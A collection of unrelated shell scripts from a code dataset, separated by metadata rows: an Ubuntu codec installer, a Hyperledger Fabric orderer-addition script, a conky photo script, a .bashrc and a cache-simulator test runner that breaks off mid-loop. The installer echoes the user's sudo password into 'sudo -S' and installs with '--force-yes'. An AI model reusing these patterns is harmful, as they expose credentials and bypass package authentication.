--text="Η εφαρμογή χρησιμοποείται για\nτην εγκατάσταση πολυμεσικής υποστήρηξης\nσε Ubuntu 10.04 έως και Ubuntu 11.04\n\nΓια λεπτομέρειες διαβάστε τις Οδηγίες Χρήσης"
# =============================================================================================================
sudo -K
while true; do
while [ -z "$PASS" ]; do
if ! PASS=$(zenity --entry --title="Έλεγχος Διαχειρηστή" --width=350 --hide-text --text="Πληκτρολογήστε τον κωδικό σας" ) ; then
FAIL="YES"
fi
done
echo "$PASS" | sudo -S -p "" /bin/true 2> "/dev/null"
if [ "$?" = "1" ]; then
FAIL="YES"
$DISPLAYSTATUS
PASS=""
else
$DISPLAYSTATUS
break
fi
done
# =============================================================================================================
ANS=$(zenity --title='uCodecsPack' --list --text "Επιλέξτε την έκδοση του Ubuntu που διαθέτετε" --radiolist --height=280 --width=350 --column "Επιλογή" --column "Έκδοση/Αρχιτεκτονική" TRUE '10.04/i386' FALSE '10.04/amd64' FALSE '10.10/i386' FALSE '10.10/amd64' FALSE '11.04/i386' FALSE '11.04/amd64'); echo $ans
if [ "$ANS" = "10.04/i386" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w32codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer flashplugin-nonfree-extrasound ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "10.04/amd64" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w64codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "10.10/i386" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w32codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer flashplugin-nonfree-extrasound ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "10.10/amd64" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w64codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "11.04/i386" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo apt-get update && sudo apt-get install -y --force-yes w32codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "11.04/amd64" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - sudo add-apt-repository ppa:sevenmachines/flash && sudo apt-get update && sudo apt-get install -y --force-yes w64codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin64-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
exit 0
| true
|
565255012c743f6b06ddc90a2f61c3db8004db71
|
Shell
|
Sumitvedpathak/hf-network-boilerplate
|
/artifacts/orderer/artifacts.sh
|
UTF-8
| 11,901
| 2.75
| 3
|
[] |
no_license
|
export TEMP_FOLDER_PATH1=./channel/temp1
export TEMP_FOLDER_PATH2=./channel/temp2
export TEMP_FOLDER_PATH3=./channel/temp3
export TEMP_FOLDER_PATH4=./channel/temp4
export CORE_PEER_TLS_ENABLED=true
export ORDERER_CA=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/orderers/orderer.example.com/msp/tlscacerts/tlsca.example.com-cert.pem
export PEER0_ORG1_CA=${PWD}/../../artifacts/channel/crypto-config/peerOrganizations/org1.example.com/peers/peer0.org1.example.com/tls/ca.crt
export PEER0_ORG2_CA=${PWD}/../../artifacts/channel/crypto-config/peerOrganizations/org2.example.com/peers/peer0.org2.example.com/tls/ca.crt
export FABRIC_CFG_PATH=${PWD}/../../artifacts/config/
export ORDERER4_TLS_FILE=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/orderers/orderer4.example.com/tls/server.crt
export CHANNEL_NAME=mychannel
export SYSTEM_CHANNEL_NAME=sys-channel
setGlobalsForOrderer() {
export CORE_PEER_LOCALMSPID="OrdererMSP"
export CORE_PEER_TLS_ROOTCERT_FILE=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/orderers/orderer.example.com/msp/tlscacerts/tlsca.example.com-cert.pem
export CORE_PEER_MSPCONFIGPATH=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/users/Admin@example.com/msp
}
setGlobalsForPeer0Org2() {
export CORE_PEER_LOCALMSPID="Org2MSP"
export CORE_PEER_TLS_ROOTCERT_FILE=$PEER0_ORG2_CA
export CORE_PEER_MSPCONFIGPATH=${PWD}/../../artifacts/channel/crypto-config/peerOrganizations/org2.example.com/users/Admin@org2.example.com/msp
export CORE_PEER_ADDRESS=localhost:9051
}
# generateCryptoMaterial(){
# echo "---------------------------Generating Crypto Material for new Organization 4---------------------------"
# cryptogen generate --config=./crypto-config.yaml --output=./channel/crypto-config/
# }
# generateCryptoMaterial
addOrderer4ToConcenterListAndSystemChannel() {
echo "---------------------------Updating Concenter list with new Orderer 4 and adding it into System Channel---------------------------"
setGlobalsForOrderer
peer channel fetch config $TEMP_FOLDER_PATH1/config_block.pb -o localhost:7050 \
--ordererTLSHostnameOverride orderer.example.com \
-c $SYSTEM_CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH1/config_block.pb \
--type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH1/config.json
echo "{\"client_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\",\"host\":\"orderer4.example.com\",\"port\":10050,\"server_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\"}" >$TEMP_FOLDER_PATH1/org4consenter.json
jq ".channel_group.groups.Orderer.values.ConsensusType.value.metadata.consenters += [$(cat $TEMP_FOLDER_PATH1/org4consenter.json)]" $TEMP_FOLDER_PATH1/config.json >$TEMP_FOLDER_PATH1/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH1/config.json --type common.Config --output $TEMP_FOLDER_PATH1/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH1/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH1/modified_config.pb
configtxlator compute_update --channel_id $SYSTEM_CHANNEL_NAME --original $TEMP_FOLDER_PATH1/config.pb --updated $TEMP_FOLDER_PATH1/modified_config.pb --output $TEMP_FOLDER_PATH1/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH1/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH1/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"sys-channel\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH1/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH1/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH1/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH1/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH1/config_update_in_envelope.pb -c $SYSTEM_CHANNEL_NAME -o localhost:7050 --tls --cafile $ORDERER_CA
}
# addOrderer4ToConcenterListAndSystemChannel
getOrdererGenesisBlock() {
echo "---------------------------Fetching Genesis Block---------------------------"
setGlobalsForOrderer
peer channel fetch config ./channel/genesis.block -o localhost:7050 -c $SYSTEM_CHANNEL_NAME --tls --cafile $ORDERER_CA
}
# getOrdererGenesisBlock
runOrderere4Container(){
echo "---------------------------Running Orderer 4 Containers---------------------------"
source .env
docker-compose -f ./docker-compose.yaml up -d
}
# runOrderere4Container
addOrderer4AddressAndInSystemChannel() {
echo "---------------------------Updating Address list with new Orderer 4 address and adding it into System Channel---------------------------"
setGlobalsForOrderer
peer channel fetch config $TEMP_FOLDER_PATH2/config_block.pb -o localhost:7050 -c $SYSTEM_CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH2/config_block.pb --type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH2/config.json
jq ".channel_group.values.OrdererAddresses.value.addresses += [\"orderer4.example.com:10050\"]" $TEMP_FOLDER_PATH2/config.json >$TEMP_FOLDER_PATH2/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH2/config.json --type common.Config --output $TEMP_FOLDER_PATH2/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH2/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH2/modified_config.pb
configtxlator compute_update --channel_id $SYSTEM_CHANNEL_NAME --original $TEMP_FOLDER_PATH2/config.pb --updated $TEMP_FOLDER_PATH2/modified_config.pb --output $TEMP_FOLDER_PATH2/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH2/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH2/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"sys-channel\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH2/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH2/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH2/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH2/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH2/config_update_in_envelope.pb -c $SYSTEM_CHANNEL_NAME -o localhost:7050 --tls true --cafile $ORDERER_CA
}
# addOrderer4AddressAndInSystemChannel
addOrderer4ToConcenterListAndApplicationChannel(){
setGlobalsForOrderer
echo "---------------------------Updating Concenter list with new Orderer 4 and adding it into Application Channel---------------------------"
peer channel fetch config $TEMP_FOLDER_PATH3/config_block.pb -o localhost:7050 -c $CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH3/config_block.pb --type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH3/config.json
echo "{\"client_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\",\"host\":\"orderer4.example.com\",\"port\":10050,\"server_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\"}" >$TEMP_FOLDER_PATH3/orderer4consenter.json
jq ".channel_group.groups.Orderer.values.ConsensusType.value.metadata.consenters += [$(cat $TEMP_FOLDER_PATH3/orderer4consenter.json)]" $TEMP_FOLDER_PATH3/config.json >$TEMP_FOLDER_PATH3/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH3/config.json --type common.Config --output $TEMP_FOLDER_PATH3/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH3/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH3/modified_config.pb
configtxlator compute_update --channel_id $CHANNEL_NAME --original $TEMP_FOLDER_PATH3/config.pb --updated $TEMP_FOLDER_PATH3/modified_config.pb --output $TEMP_FOLDER_PATH3/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH3/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH3/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"mychannel\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH3/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH3/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH3/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH3/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH3/config_update_in_envelope.pb -c mychannel -o localhost:7050 --tls true --cafile $ORDERER_CA
}
# addOrderer4ToConcenterListAndApplicationChannel
addOrderer4AddressAndInApplicationhannel() {
echo "---------------------------Updating Address list with new Orderer 4 address and adding it into Application Channel---------------------------"
setGlobalsForOrderer
peer channel fetch config $TEMP_FOLDER_PATH4/config_block.pb -o localhost:7050 -c $CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH4/config_block.pb --type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH4/config.json
jq ".channel_group.values.OrdererAddresses.value.addresses += [\"orderer4.example.com:10050\"]" $TEMP_FOLDER_PATH4/config.json >$TEMP_FOLDER_PATH4/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH4/config.json --type common.Config --output $TEMP_FOLDER_PATH4/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH4/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH4/modified_config.pb
configtxlator compute_update --channel_id $CHANNEL_NAME --original $TEMP_FOLDER_PATH4/config.pb --updated $TEMP_FOLDER_PATH4/modified_config.pb --output $TEMP_FOLDER_PATH4/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH4/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH4/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"$CHANNEL_NAME\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH4/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH4/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH4/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH4/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH4/config_update_in_envelope.pb -c $CHANNEL_NAME -o localhost:7050 --tls true --cafile $ORDERER_CA
}
# addOrderer4ToConcenterListAndApplicationChannel
chaincodeQuery() {
echo "---------------------------Quering Chaincode by Peer 0 of Org 2---------------------------"
setGlobalsForPeer0Org2
# export CAR=$(echo -n "{\"key\":\"1111\", \"make\":\"Hyundai\",\"model\":\"Tucson\",\"color\":\"Gray\",\"owner\":\"Sumit\",\"price\":\"22000\"}" | base64 | tr -d \\n)
peer chaincode invoke -o localhost:7050 \
--ordererTLSHostnameOverride orderer.example.com \
--tls $CORE_PEER_TLS_ENABLED \
--cafile $ORDERER_CA \
-C $CHANNEL_NAME -n "fabcar" \
--peerAddresses localhost:7051 \
--tlsRootCertFiles $PEER0_ORG1_CA \
--peerAddresses localhost:9051 \
--tlsRootCertFiles $PEER0_ORG2_CA \
-c '{"function": "createCar", "Args":["CAR_ls","Hyundai", "Palisade", "Gray", "Sumit"]}'
# Query Car by Id
peer chaincode query -C $CHANNEL_NAME -n "fabcar" -c '{"function": "queryCar","Args":["CAR_ls"]}'
}
# generateCryptoMaterial
addOrderer4ToConcenterListAndSystemChannel
getOrdererGenesisBlock
runOrderere4Container
addOrderer4AddressAndInSystemChannel
addOrderer4ToConcenterListAndApplicationChannel
# chaincodeQuery
| true
|
855b8084f02ea49aa31ad84610b956e636e8eeea
|
Shell
|
wwchang/dotfiles
|
/.conky/resources/scripts/conkyPhotoRandom
|
UTF-8
| 1,553
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Photo in conky
# by helmuthdu and paulvictor
#source="~/.myconky/pics"
photo=~/.conky/images/cute_boy.png
#cd $source
cd ~/.conky/images/
number=$(ls -R | wc -l)
random=$RANDOM
random=${random}%${number}
lines=`echo ${random} + 2 | bc`
filename=`ls | head -n $lines | tail -n 1`
cp $filename $photo
picture_aspect=$(($(identify -format %w $photo) - $(identify -format %h $photo)))
if [ "$picture_aspect" -lt "100" ] && [ "$picture_aspect" -gt "-100" ]; then
convert $photo -thumbnail 175x280 $photo
convert $photo -crop 175x125+0+$(( ($(identify -format %h $photo) - 180) / 2)) +repage $photo
elif [ "$picture_aspect" -gt "0" ]; then
convert $photo -thumbnail 280x175 $photo
convert $photo -crop 175x125+$(( ($(identify -format %w $photo) - $picture_aspect*2) / 2))+0 +repage $photo
else
convert $photo -thumbnail 175x280 $photo
convert $photo -crop 175x125+0+$(( ($(identify -format %h $photo) - 180) / 2)) +repage $photo
fi
# Theme 1
convert $photo \( +clone -threshold -1 -draw 'fill black polygon 0,0 0,10 10,0 fill white circle 10,10 10,0' \( +clone -flip \) -compose Multiply -composite \( +clone -flop \) -compose Multiply -composite \) +matte -compose CopyOpacity -composite $photo
convert -page +2+3 $photo -matte \( +clone -background black -shadow 50x3+0+0 \) +swap -background none -mosaic $photo
# Theme 2
#convert -page +2+3 $photo -bordercolor black -border 1 -background none -rotate 0 -background black \( +clone -shadow 50x3+0+0 \) +swap -background none -flatten $photo
exit 0
| true
|
2d95f2b43b071282e1bcbe25ebfc1b4a516d0a56
|
Shell
|
tfwio/session
|
/do
|
UTF-8
| 287
| 2.5625
| 3
|
[
"MIT"
] |
permissive
|
#! /usr/bin/env bash
for i in ${@}; do
case ${i} in
cli)
echo go clean
go clean
echo go build ./examples/cli
go build ./examples/cli
;;
gin|srv)
echo go clean
go clean
echo go build ./examples/srv
go build ./examples/srv
;;
esac
done
| true
|
5abf53efd1c6b59501bd24045de7bc30deec37a4
|
Shell
|
gouf/dotfiles
|
/.bashrc
|
UTF-8
| 7,251
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
if [[ $(uname -s) -eq 'Darwin' ]]; then
export LSCOLORS=gxfxcxdxbxegedabagacad
export LS_COLORS="di=36;40:ln=35:so=32:pi=33:ex=31:bd=34;46:cd=34;43:su=30;41:sg=30;46:tw=36;42:ow=30;43"
fi
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
# HISTCONTROL=ignoreboth
HISTCONTROL=ignoreboth:erasedups
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=100000
SAVEHIST=1000000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# functions type commands
if [ -f ~/.bash_functions ]; then
. ~/.bash_functions
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
# git - https://github.com/git/git/tree/master/contrib/completion
GIT_PS1_SHOWDIRTYSTATE=true
if [[ $(uname -s) -eq 'Darwin' ]]; then
export PS1='\[\033[32m\]\u@\h\[\033[00m\]:\[\033[36m\]\w\[\033[31m\]$(__git_ps1)\[\033[00m\]\$ '
else
export PS1='\[\033[32m\]\u@\h\[\033[00m\]:\[\033[34m\]\w\[\033[31m\]$(__git_ps1)\[\033[00m\]\$ '
fi
# hub - https://github.com/github/hub/
export PATH=~/.local/bin:$PATH
eval "$(hub alias -s)"
if [ $(uname -s) == "Darwin" ]; then
if [ -f $(brew --prefix)/etc/bash_completion ]; then
. $(brew --prefix)/etc/bash_completion
fi
fi
if [ -f $HOME/git-prompt.sh ]; then
source $HOME/git-prompt.sh
fi
export PATH="$HOME/.anyenv/bin:$PATH"
eval "$(anyenv init -)"
export EDITOR="vim"
export MAKE_OPTS=-j4
source ~/.anyenv/completions/anyenv.bash
### Added by the Heroku Toolbelt
export PATH="/usr/local/heroku/bin:$PATH"
# Load pyenv
export PATH="$HOME/.pyenv/bin:$PATH"
eval "$(pyenv init --path)"
export GOPATH="$HOME/.golang"
export GOBIN="$GOPATH/bin"
export PATH="$GOPATH/bin:$PATH"
export PATH="$GOROOT/bin:$PATH"
export PATH="~/.cabal/bin:/opt/cabal/1.20/bin:/opt/ghc/7.8.4/bin:$PATH"
export PATH="~/.terraform:$PATH"
export NPM_PACKAGES="$HOME/.npm-packages"
export NODE_PATH="$NPM_PACKAGES/lib/node_modules:$NODE_PATH"
PATH="$NPM_PACKAGES/bin:$PATH"
# Unset manpath so we can inherit from /etc/manpath via the `manpath`
# command
unset MANPATH # delete if you already modified MANPATH elsewhere in your config
export MANPATH="$NPM_PACKAGES/share/man:$(manpath)"
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm
export PATH="$HOME/.anyenv/bin:$PATH"
eval "$(anyenv init -)"
export PATH="$HOME/swift-2.2-SNAPSHOT-2015-12-21-a-ubuntu15.10/usr/bin:$PATH"
# added by travis gem
[ -f $HOME/.travis/travis.sh ] && source $HOME/.travis/travis.sh
export ANDROID_HOME="/usr/local/Cellar/android-sdk/24.4.1_1/"
#THIS MUST BE AT THE END OF THE FILE FOR SDKMAN TO WORK!!!
export SDKMAN_DIR="$HOME/.sdkman"
[[ -s "$HOME/.sdkman/bin/sdkman-init.sh" ]] && source "$HOME/.sdkman/bin/sdkman-init.sh"
export GRADLE_USER_HOME="/usr/local/opt/gradle/libexec"
export PATH="$HOME/.chefdk/gem/ruby/2.3.0/bin:$PATH"
export PATH="$HOME/.local/bin:$PATH"
# bashmarks - https://github.com/huyng/bashmarks
# bash directory bookmark
if [ -f ~/.local/bin/bashmarks.sh ]; then
source ~/.local/bin/bashmarks.sh
fi
if [ -f ~/.homebrew_github_api_token ]; then
source ~/.homebrew_github_api_token
fi
export PATH="$HOME/.config/composer/vendor/bin:$PATH"
export GPG_TTY=$(tty)
eval "$(pipenv --completion)"
# heroku autocomplete setup
CLI_ENGINE_AC_BASH_SETUP_PATH=$HOME/.cache/heroku/completions/bash_setup && test -f $CLI_ENGINE_AC_BASH_SETUP_PATH && source $CLI_ENGINE_AC_BASH_SETUP_PATH;
#
# enhancd settings
# Ref: https://github.com/b4b4r07/enhancd
#
if [ -f ~/.enhancd/init.sh ]; then
# export ENHANCD_COMMAND=ecd # Default command modification
export ENHANCD_FILTER="peco"
export ENHANCD_DOT_SHOW_FULLPATH=1
export ENHANCD_DISABLE_DOT=0 # Default: 0
export ENHANCD_DISABLE_HYPHEN=0 # Default: 0
export ENHANCD_DISABLE_HOME=0 # Default: 0
export ENHANCD_DOT_ARG=".." # Default: "..", If set, that behavior same act as original cd
export ENHANCD_HYPHEN_ARG="-" # Default: "-", If set, that behavior same act as original cd
export ENHANCD_HOME_ARG="" # Default: ""
export ENHANCD_HOOK_AFTER_CD="ls" # Default: ""
export ENHANCD_USE_FUZZY_MATCH=1 # Default: 1
source ~/.enhancd/init.sh
fi
# Overwrite Ctrl-R key map
[[ "$(uname -s)" = 'Linux' ]] && bind -x '"\C-r":peco-select-history-linux'
[[ "$(uname -s)" = 'Darwin' ]] && bind -x '"\C-r":peco-select-history-mac'
if ! command -v direnv; then
eval "$(direnv hook bash)"
fi
# tabtab source for packages
# uninstall by removing these lines
[ -f ~/.config/tabtab/__tabtab.bash ] && . ~/.config/tabtab/__tabtab.bash || true
| true
|
f31db0ba217e68dd7918bfef48eecd69de512c5b
|
Shell
|
emilio93/ie521
|
/tarea1/scripts/runTests.sh
|
UTF-8
| 2,941
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
rm results.csv 2> /dev/null
touch results.csv
echo "Identificador,Cache Size(KB),Cache Associativity,Cache Block Size(bytes),Cache replacement policy,Miss penalty(cyc),Execution time(cycles),instructions,Memory accesses,Overall miss rate,Read miss rate,Average memory access time (cycles),Dirty evictions,Load misses,Store misses,Total misses,Load hits,Store hits,Total hits,CPI\
" > results.csv
for trace in ./data/*.gz; do
echo " "
echo "-------------- ${trace} --------------"
echo " "
## Sim 1
echo " "
echo "-------------- SIM 1 --------------"
echo " "
declare -a tamanoCache=("16" "32" "128")
declare -a cycleMult=("1" "1.05" "1.15")
cacheBlockSize=16
missPenalty=5
cacheRP="LRU"
cacheAssoc=1
TEMPFILE=/tmp/$$.tmp
echo 0 > $TEMPFILE
COUNTER=$[$(cat $TEMPFILE)]
for i in "${tamanoCache[@]}"
do
echo ./cache -t ${i} -a ${cacheAssoc} -l ${cacheBlockSize} -mp ${missPenalty} -rp ${cacheRP} -f ${trace} -c ${cycleMult[$COUNTER]}
./cache -t ${i} -a ${cacheAssoc} -l ${cacheBlockSize} -mp ${missPenalty} -rp ${cacheRP} -f ${trace} -c ${cycleMult[$COUNTER]}
echo "----------------------------"
COUNTER=$[$(cat $TEMPFILE) + 1]
echo $COUNTER > $TEMPFILE
done
unlink $TEMPFILE
## Sim 2
echo " "
echo "-------------- SIM 2 --------------"
echo " "
declare -a tamanoBloque=("16" "32" "64")
declare -a missPenalty=(1 2 6)
cacheSize=16
cacheRP="LRU"
cacheAssoc=1
TEMPFILE=/tmp/$$.tmp
echo 0 > $TEMPFILE
COUNTER=$[$(cat $TEMPFILE)]
for i in "${tamanoBloque[@]}"
do
echo ./cache -t ${cacheSize} -a ${cacheAssoc} -l ${i} -mp ${missPenalty[$COUNTER]} -rp ${cacheRP} -f ${trace}
